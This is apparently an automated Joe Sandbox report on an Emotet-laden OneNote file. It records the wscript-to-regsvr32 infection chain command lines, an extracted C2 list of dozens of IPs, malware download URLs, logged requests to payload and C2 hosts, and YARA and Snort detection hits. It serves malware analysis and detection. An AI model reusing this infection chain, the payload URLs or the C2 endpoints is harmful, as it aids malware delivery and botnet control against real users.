Edit tour

Windows Analysis Report
Insight_Medical_Publishing.one

Overview

General Information

Sample Name:	Insight_Medical_Publishing.one
Analysis ID:	828491
MD5:	ff762b2f28c3bcaaabcc6f7656f92d50
SHA1:	9448c2d43c1e7155a4003d513c95f42fd29a2b7f
SHA256:	62ff7b52aeac2e32e59d8168cd55db1522de07833d476c8e26b36f40724bbebe
Tags:	one
Infos:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Malicious OneNote

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Sigma detected: Run temp file via regsvr32

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document exploit detected (process start blacklist hit)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Detected TCP or UDP traffic on non-standard ports

Connects to several IPs in different countries

Registers a DLL

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

ONENOTE.EXE (PID: 5812 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Insight_Medical_Publishing.one MD5: 8D7E99CB358318E1F38803C9E6B67867)

wscript.exe (PID: 6076 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf" MD5: 7075DD7B9BE8807FCA93ACD86F724884)

regsvr32.exe (PID: 6140 cmdline: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

regsvr32.exe (PID: 624 cmdline: "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 3480 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\CRCPqQPgWxqcgJu\zBLf.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Emotet	While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.	GOLD CABIN MUMMY SPIDER Mealybug	http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1 http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/ http://ropgadget.com/posts/defensive_pcres.html https://adalogics.com/blog/the-state-of-advanced-code-injections https://asec.ahnlab.com/en/33600/	https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet

Malware Configuration

Threatname: Emotet

{"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5cZosrQAhAJI=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx285qirQAHAJQ="]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Insight_Medical_Publishing.one	JoeSecurity_MalOneNote	Yara detected Malicious OneNote	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.633268738.00000000024A1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.632774627.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Emotet_3	Yara detected Emotet	Joe Security
00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000001.00000002.410280537.0000000005950000.00000004.00000020.00020000.00000000.sdmp	WEBSHELL_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x1dde:$asp_gen_obf1: "+" 0x1e0e:$asp_gen_obf1: "+" 0xc82:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8 0x1bf2:$asp_input1: request 0x1f2c:$asp_payload11: wscript.shell 0x1b14:$asp_multi_payload_one1: createobject 0x1c02:$asp_multi_payload_one1: createobject 0x1c7a:$asp_multi_payload_one1: createobject 0x1cd4:$asp_multi_payload_one1: createobject 0x1f10:$asp_multi_payload_one1: createobject 0x1b14:$asp_multi_payload_four1: createobject 0x1c02:$asp_multi_payload_four1: createobject 0x1c7a:$asp_multi_payload_four1: createobject 0x1cd4:$asp_multi_payload_four1: createobject 0x1f10:$asp_multi_payload_four1: createobject 0x1b14:$asp_cr_write1: createobject( 0x1c02:$asp_cr_write1: createobject( 0x1c7a:$asp_cr_write1: createobject( 0x1cd4:$asp_cr_write1: createobject( 0x1f10:$asp_cr_write1: createobject( 0xc82:$tagasp_capa_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8
00000004.00000002.633113023.0000000002470000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.394237603.0000000000700000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
4.2.regsvr32.exe.2470000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.regsvr32.exe.2470000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.700000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.700000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security

Sigma Signatures

Malware Analysis System Evasion

Sigma detected: Run temp file via regsvr32

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll, CommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 6076, ParentProcessName: wscript.exe, ProcessCommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll, ProcessId: 6140, ProcessName: regsvr32.exe

Snort Signatures

ET CNC Feodo Tracker Reported CnC Server TCP group 2 - Source IP: 192.168.2.4 - Destination IP: 104.168.155.143

Timestamp:	192.168.2.4104.168.155.1434969680802404302 03/17/23-09:11:36.169787
SID:	2404302
Source Port:	49696
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CNC Feodo Tracker Reported CnC Server TCP group 23 - Source IP: 192.168.2.4 - Destination IP: 91.121.146.47

Timestamp:	192.168.2.491.121.146.474968680802404344 03/17/23-09:10:50.935597
SID:	2404344
Source Port:	49686
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CNC Feodo Tracker Reported CnC Server TCP group 7 - Source IP: 192.168.2.4 - Destination IP: 182.162.143.56

Timestamp:	192.168.2.4182.162.143.56496894432404312 03/17/23-09:11:04.665638
SID:	2404312
Source Port:	49689
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CNC Feodo Tracker Reported CnC Server TCP group 16 - Source IP: 192.168.2.4 - Destination IP: 66.228.32.31

Timestamp:	192.168.2.466.228.32.314968870802404330 03/17/23-09:10:59.416914
SID:	2404330
Source Port:	49688
Destination Port:	7080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CNC Feodo Tracker Reported CnC Server TCP group 5 - Source IP: 192.168.2.4 - Destination IP: 167.172.199.165

Timestamp:	192.168.2.4167.172.199.1654969180802404308 03/17/23-09:11:21.428977
SID:	2404308
Source Port:	49691
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Insight_Medical_Publishing.one	ReversingLabs: Detection: 30%
Source: Insight_Medical_Publishing.one	Virustotal: Detection: 40%			Perma Link

Antivirus detection for URL or domain

Source: https://91.121.146.47:8080/jesecsgigcdk/zfgrij/wjhswvhm/D	Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/	Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/	Avira URL Cloud: Label: malware
Source: http://ozmeydan.com/cekici/9/	Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM	Avira URL Cloud: Label: malware
Source: https://www.gomespontes.com.br/logs/pd/	Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0	Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/tM	Avira URL Cloud: Label: malware
Source: http://softwareulike.com/cWIYxWMPkK/	Avira URL Cloud: Label: malware
Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM	Avira URL Cloud: Label: malware
Source: https://163.44.196.120:8080/jesecsgigcdk/zfgrij/wjhswvhm/	Avira URL Cloud: Label: malware
Source: http://softwareulike.com/cWIYxWMPkK/yM	Avira URL Cloud: Label: malware
Source: https://182.162.143.56/jesecsgigcdk/zfgrij/wjhswvhm/	Avira URL Cloud: Label: malware
Source: https://91.121.146.47:8080/	Avira URL Cloud: Label: malware
Source: https://163.44.196.120:8080/	Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/D	Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/	Avira URL Cloud: Label: malware
Source: https://164.90.222.65:443/jesecsgigcdk/zfgrij/wjhswvhm/	Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/:	Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllG	Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6	Avira URL Cloud: Label: malware
Source: https://163.44.196.120:8080/a	Avira URL Cloud: Label: malware
Source: https://www.gomespontes.com.br/logs/pd/vM	Avira URL Cloud: Label: malware
Source: https://www.gomespontes.com.br/logs/pd/RPROFIN	Avira URL Cloud: Label: malware
Source: http://ozmeydan.com/cekici/9/xM	Avira URL Cloud: Label: malware
Source: https://167.172.199.165:8080/jesecsgigcdk/zfgrij/wjhswvhm/	Avira URL Cloud: Label: malware
Source: https://167.172.199.165:8080/	Avira URL Cloud: Label: malware
Source: https://www.gomespontes.com.br/logs/pd/RPROFII	Avira URL Cloud: Label: malware
Source: https://91.121.146.47:8080/jesecsgigcdk/zfgrij/wjhswvhm/	Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dll	Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM	Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/o8	Avira URL Cloud: Label: malware
Source: https://167.172.199.165:8080/&C	Avira URL Cloud: Label: malware
Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/	Avira URL Cloud: Label: malware
Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/LE=C:	Avira URL Cloud: Label: malware
Source: https://penshorn.org:443/admin/Ses8712iGR8du/script.createobject(	Avira URL Cloud: Label: malware
Source: https://164.90.222.65/jesecsgigcdk/zfgrij/wjhswvhm/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll	ReversingLabs: Detection: 58%
Source: C:\Windows\System32\CRCPqQPgWxqcgJu\zBLf.dll (copy)	ReversingLabs: Detection: 58%

Source: 00000004.00000002.632774627.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Emotet {"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5cZosrQAhAJI=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx285qirQAHAJQ="]}

Source: unknown	HTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.4:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.4:49689 version: TLS 1.2

Source:	Binary string: ain.pdb source: OneNote15WatsonLog.etl.0.dr
Source:	Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdbain.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: OneNote15WatsonLog.etl.0.dr
Source:	Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdb source: OneNote15WatsonLog.etl.0.dr

Source: C:\Windows\System32\regsvr32.exe

Code function: 3_2_0000000180008D28 FindFirstFileExW,

3_2_0000000180008D28

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

Process created: C:\Windows\SysWOW64\wscript.exe

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 164.90.222.65 443	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 203.26.41.131 443	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Domain query: penshorn.org
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 66.228.32.31 7080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 187.63.160.88 80	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 104.168.155.143 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 91.121.146.47 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 160.16.142.56 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 182.162.143.56 443	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 167.172.199.165 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 163.44.196.120 8080	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.4:49689 -> 182.162.143.56:443
Source: Traffic	Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.4:49686 -> 91.121.146.47:8080
Source: Traffic	Snort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.4:49688 -> 66.228.32.31:7080
Source: Traffic	Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.4:49691 -> 167.172.199.165:8080
Source: Traffic	Snort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.4:49696 -> 104.168.155.143:8080

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 91.121.146.47:8080
Source: Malware configuration extractor	IPs: 66.228.32.31:7080
Source: Malware configuration extractor	IPs: 182.162.143.56:443
Source: Malware configuration extractor	IPs: 187.63.160.88:80
Source: Malware configuration extractor	IPs: 167.172.199.165:8080
Source: Malware configuration extractor	IPs: 164.90.222.65:443
Source: Malware configuration extractor	IPs: 104.168.155.143:8080
Source: Malware configuration extractor	IPs: 163.44.196.120:8080
Source: Malware configuration extractor	IPs: 160.16.142.56:8080
Source: Malware configuration extractor	IPs: 159.89.202.34:443
Source: Malware configuration extractor	IPs: 159.65.88.10:8080
Source: Malware configuration extractor	IPs: 186.194.240.217:443
Source: Malware configuration extractor	IPs: 149.56.131.28:8080
Source: Malware configuration extractor	IPs: 72.15.201.15:8080
Source: Malware configuration extractor	IPs: 1.234.2.232:8080
Source: Malware configuration extractor	IPs: 82.223.21.224:8080
Source: Malware configuration extractor	IPs: 206.189.28.199:8080
Source: Malware configuration extractor	IPs: 169.57.156.166:8080
Source: Malware configuration extractor	IPs: 107.170.39.149:8080
Source: Malware configuration extractor	IPs: 103.43.75.120:443
Source: Malware configuration extractor	IPs: 91.207.28.33:8080
Source: Malware configuration extractor	IPs: 213.239.212.5:443
Source: Malware configuration extractor	IPs: 45.235.8.30:8080
Source: Malware configuration extractor	IPs: 119.59.103.152:8080
Source: Malware configuration extractor	IPs: 164.68.99.3:8080
Source: Malware configuration extractor	IPs: 95.217.221.146:8080
Source: Malware configuration extractor	IPs: 153.126.146.25:7080
Source: Malware configuration extractor	IPs: 197.242.150.244:8080
Source: Malware configuration extractor	IPs: 202.129.205.3:8080
Source: Malware configuration extractor	IPs: 103.132.242.26:8080
Source: Malware configuration extractor	IPs: 139.59.126.41:443
Source: Malware configuration extractor	IPs: 110.232.117.186:8080
Source: Malware configuration extractor	IPs: 183.111.227.137:8080
Source: Malware configuration extractor	IPs: 5.135.159.50:443
Source: Malware configuration extractor	IPs: 201.94.166.162:443
Source: Malware configuration extractor	IPs: 103.75.201.2:443
Source: Malware configuration extractor	IPs: 79.137.35.198:8080
Source: Malware configuration extractor	IPs: 172.105.226.75:8080
Source: Malware configuration extractor	IPs: 94.23.45.86:4143
Source: Malware configuration extractor	IPs: 115.68.227.76:8080
Source: Malware configuration extractor	IPs: 153.92.5.27:8080
Source: Malware configuration extractor	IPs: 167.172.253.162:8080
Source: Malware configuration extractor	IPs: 188.44.20.25:443
Source: Malware configuration extractor	IPs: 147.139.166.154:8080
Source: Malware configuration extractor	IPs: 129.232.188.93:443
Source: Malware configuration extractor	IPs: 173.212.193.249:8080
Source: Malware configuration extractor	IPs: 185.4.135.165:8080
Source: Malware configuration extractor	IPs: 45.176.232.124:443

Source: Joe Sandbox View

ASN Name: RACKCORP-APRackCorpAU RACKCORP-APRackCorpAU

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: global traffic

HTTP traffic detected: POST /jesecsgigcdk/zfgrij/wjhswvhm/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 182.162.143.56

Source: Joe Sandbox View

IP Address: 110.232.117.186 110.232.117.186

Source: global traffic

HTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org

Source: global traffic	TCP traffic: 192.168.2.4:49686 -> 91.121.146.47:8080
Source: global traffic	TCP traffic: 192.168.2.4:49688 -> 66.228.32.31:7080
Source: global traffic	TCP traffic: 192.168.2.4:49691 -> 167.172.199.165:8080
Source: global traffic	TCP traffic: 192.168.2.4:49696 -> 104.168.155.143:8080
Source: global traffic	TCP traffic: 192.168.2.4:49697 -> 163.44.196.120:8080
Source: global traffic	TCP traffic: 192.168.2.4:49698 -> 160.16.142.56:8080

Source: unknown

Network traffic detected: IP country count 17

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.146.47
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 66.228.32.31
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 187.63.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 167.172.199.165
Source: unknown	TCP traffic detected without corresponding DNS query: 167.172.199.165
Source: unknown	TCP traffic detected without corresponding DNS query: 167.172.199.165
Source: unknown	TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown	TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown	TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown	TCP traffic detected without corresponding DNS query: 164.90.222.65
Source: unknown	TCP traffic detected without corresponding DNS query: 164.90.222.65

Source: wscript.exe, 00000001.00000003.406123541.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410685138.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407893232.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395243756.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.487960749.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488247540.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488515239.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000003.487960749.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488247540.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488515239.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: regsvr32.exe, 00000004.00000003.487960749.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488247540.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488515239.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/Low
Source: regsvr32.exe, 00000004.00000003.631557827.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488456435.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632847163.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
